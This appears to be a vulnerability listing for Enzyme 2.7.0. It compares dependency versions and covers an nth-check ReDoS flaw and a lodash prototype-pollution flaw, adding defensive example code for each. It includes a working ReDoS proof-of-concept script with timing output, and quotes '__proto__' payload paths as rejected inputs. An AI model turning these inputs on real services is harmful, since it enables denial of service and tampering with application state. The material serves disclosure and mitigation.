Enzyme version 2.7.0 represents a notable update to Airbnb's popular JavaScript testing utility for React, building upon the foundation laid by version 2.6.0. Both versions provide tools for easily asserting, manipulating, and traversing React components' output, streamlining the testing process. Key differences emerge in the dependency updates, particularly within the development environment. While both rely on core tools like Babel, ESLint, and Webpack for development and testing, version 2.7.0 incorporates newer versions of ESLint and its associated plugins. Specifically, eslint moves from ^3.9.1 to ^3.10.2, and eslint-plugin-react advances from ^6.6.0 to ^6.7.1.
These updates suggest improvements in linting rules and React-specific code analysis, potentially catching more subtle errors and promoting cleaner code. The lodash dependency also moves from ^4.16.4 in version 2.6.0 to ^4.17.2 in version 2.7.0. For developers, this means a slightly more polished and robust testing environment in 2.7.0, benefiting from the latest static analysis capabilities. The core functionality of interacting with React components remains consistent, allowing users to upgrade without significant code changes while taking advantage of the enhanced development tools. Both versions keep the same peer dependency requirements for React, indicating compatibility with a wide range of React versions.
All vulnerabilities affecting version 2.7.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS weakness of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))?, in which two quantified \s* runs become adjacent whenever the optional sign is absent, so a long run of whitespace followed by a non-digit can be split between them in many ways and forces exponential backtracking. It can be triggered with the following code.
Proof of Concept
```javascript
// PoC.js
var nthCheck = require("nth-check");
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a long whitespace run and a trailing non-digit
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str);
    }
    catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
}
```
The Output
```
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
```
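The root cause above is backtracking over ambiguous whitespace, so the structural fix is a parser whose running time cannot depend on how the input is split. The following is an added example, not nth-check's own code: a hand-written, backtracking-free parser for the CSS "an+b" micro-syntax that returns [a, b] in the same shape as nth-check.parse, and rejects the malformed "2n   ...   !" input from the PoC in a single linear pass. The grammar it accepts (optional sign directly before the a coefficient, optional whitespace around the sign of b) is an assumption of this example.

```javascript
// Added example: linear-time "an+b" parser (not the nth-check implementation).
// Returns [a, b] for "an+b", "odd", "even" or a plain integer; throws on anything else.
function parseNth(input) {
  const s = String(input).trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];

  const n = s.length;
  let i = 0;

  // Each helper advances i monotonically, so the whole parse is O(n) with no backtracking.
  const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';
  const skipWs = () => { while (i < n && isWs(s[i])) i++; };
  const readDigits = () => { const start = i; while (i < n && s[i] >= '0' && s[i] <= '9') i++; return s.slice(start, i); };
  const readSign = () => {            // returns +1/-1 and whether a sign character was present
    if (s[i] === '+') { i++; return { sign: 1, present: true }; }
    if (s[i] === '-') { i++; return { sign: -1, present: true }; }
    return { sign: 1, present: false };
  };

  let a = 0;
  let b = 0;
  const aSign = readSign();
  const aDigits = readDigits();

  if (s[i] === 'n') {
    // "an" part: a missing coefficient means 1 ("n", "-n", "+n").
    i++;
    a = aSign.sign * (aDigits === '' ? 1 : parseInt(aDigits, 10));
    skipWs();
    if (i < n) {
      // "+b" / "-b" part: sign is mandatory here, whitespace is allowed around it.
      const bSign = readSign();
      if (!bSign.present) throw new Error(`expected '+' or '-' at position ${i}`);
      skipWs();
      const bDigits = readDigits();
      if (bDigits === '') throw new Error(`expected digits at position ${i}`);
      b = bSign.sign * parseInt(bDigits, 10);
    }
  } else {
    // No "n": the whole expression is a plain integer b.
    if (aDigits === '') throw new Error(`expected a number or 'n' at position ${i}`);
    b = aSign.sign * parseInt(aDigits, 10);
  }

  skipWs();
  if (i !== n) throw new Error(`unexpected character '${s[i]}' at position ${i}`);
  return [a, b];
}

// Constructed input in the shape of the PoC above: long whitespace run, then a stray "!".
// With a linear parser this fails fast regardless of length.
function rejectsPocShape(runLength) {
  const sample = '2n' + ' '.repeat(runLength) + '!';
  const started = Date.now();
  let threw = false;
  try { parseNth(sample); } catch (e) { threw = true; }
  return { threw, elapsedMs: Date.now() - started };
}

module.exports = { parseNth, rejectsPocShape };
```

Beyond replacing the regex, a cheap defence-in-depth measure for any selector parser exposed to untrusted input is an upper bound on input length before parsing, since legitimate "an+b" expressions are a handful of characters long.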
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions `pick`, `set`, `setWith`, `update`, `updateWith`, and `zipObjectDeep` allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
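The affected lodash functions share one property: they walk a caller-supplied path and write into whatever object that path reaches, including Object.prototype when a path component is `__proto__` (or `constructor.prototype`). The following is an added example, not lodash's code: a deep "set" helper of the kind an application might use in place of `_.set` for request-derived paths, which refuses the reserved property names and only descends into own, plain-object properties. The path syntax it accepts and the sample request body are assumptions of this example.

```javascript
// Added example (not lodash): a deep-set helper hardened against prototype pollution.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Split "a.b[0].c" into ["a", "b", "0", "c"]; arrays of keys are taken as-is.
function toPath(path) {
  if (Array.isArray(path)) return path.map(String);
  return String(path).split(/[.[\]]+/).filter(Boolean);
}

function assertSafeKey(key) {
  if (FORBIDDEN_KEYS.has(key)) {
    throw new Error(`refusing to set reserved property "${key}"`);
  }
}

function safeSet(target, path, value) {
  const keys = toPath(path);
  if (keys.length === 0) return target;
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    assertSafeKey(key);
    // Never follow inherited properties (that is how a walk reaches the prototype chain);
    // create a fresh plain object unless an own, non-null object is already there.
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || typeof node[key] !== 'object' || node[key] === null) {
      node[key] = {};
    }
    node = node[key];
  }
  const last = keys[keys.length - 1];
  assertSafeKey(last);
  node[last] = value;
  return target;
}

// Constructed sample: settings updates whose keys come from a deserialized request body.
function applyUpdates(updates) {
  const settings = {};
  const rejected = [];
  for (const [path, value] of updates) {
    try {
      safeSet(settings, path, value);
    } catch (e) {
      rejected.push(path);
    }
  }
  return { settings, rejected };
}

function demo() {
  const result = applyUpdates([
    ['ui.theme', 'dark'],
    ['__proto__.isAdmin', true],          // payload shape described in the advisory
    ['constructor.prototype.isAdmin', true],
    ['limits.maxItems', 50],
  ]);
  // A fresh object must not have picked up anything from the rejected paths.
  return { ...result, leaked: ({}).isAdmin };
}

module.exports = { safeSet, applyUpdates, demo };
```

For defence in depth, applications that never intend to extend built-ins can additionally call `Object.freeze(Object.prototype)` at startup, which turns a successful pollution attempt into a no-op (or a TypeError in strict mode) rather than a global change visible to every object.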